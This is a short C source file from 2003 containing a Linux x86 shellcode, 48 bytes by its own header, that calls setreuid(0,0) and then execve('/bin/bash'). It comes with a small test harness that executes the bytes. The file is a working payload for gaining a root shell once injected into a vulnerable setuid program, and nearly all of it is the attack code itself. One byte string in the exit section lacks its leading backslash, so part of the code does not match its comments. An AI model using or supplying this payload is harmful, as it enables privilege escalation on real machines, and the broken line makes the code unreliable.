/*
 *		     (c) ROSIELLO SECURITY 2003
 *				  &
 * 			 DTORS SECURITY 2003 
 *
 * Linux x86 shellcode 48 bytes
 * setreuid(0,0); 
 * execve("/bin/bash", NULL); 
 * exit(0);
 *--------------------------------------------------------------------------
 * AUTHOR : Angelo Rosiello
 * CONTACT: angelo@rosiello.org, angelo@dtors.net, rosiello.angelo@virgilio.it
 * URL    : http://www.rosiello.org
 *
 */	

#include <unistd.h>


char shellcode[] =

	//setreuid(0, 0);
	"\x31\xc0"			// xor %eax, %eax
	"\xb0\x70" 			// movb $0x70, %al
	"\x31\xdb"			// xor %ebx, %ebx
	"\x31\xc9"			// xor %ecx,  %ecx
	"\xcd\x80"			// int $0x80
	
	//execve("/bin/bash", NULL)
	"\x31\xc0"			// xor     %eax,%eax
	"\x50"				// push  	%eax
	"\x6a\x68"			// pushl $0x68
	"\x68\x2f\x62\x61\x73"		// push $0x7361622f
        "\x68\x2f\x62\x69\x6e"		// push $0x6e69622f
        "\x89\xe3"			// mov    %esp,%ebx	
	"\x8d\x54\x24\x0c"		// lea 0xc(%esp, 1), %edx 
        "\x50"				// push   %eax
        "\x53"				// push   %ebx
        "\x8d\x0c\x24"			// lea    (%esp,1),%ecx
        "\xb0\x0b"			// mov    $0xb,%al
        "\xcd\x80"			// int    $0x80

	//exit(0);
	"x31\xc0"			// xor %eax, %eax
	"\xb0\x01"			// movb $0x1, %al
	"\xcd\x80";			// int $0x80

main()
{
        void (*routine) ();
        (long) routine = &shellcode;
        routine();
}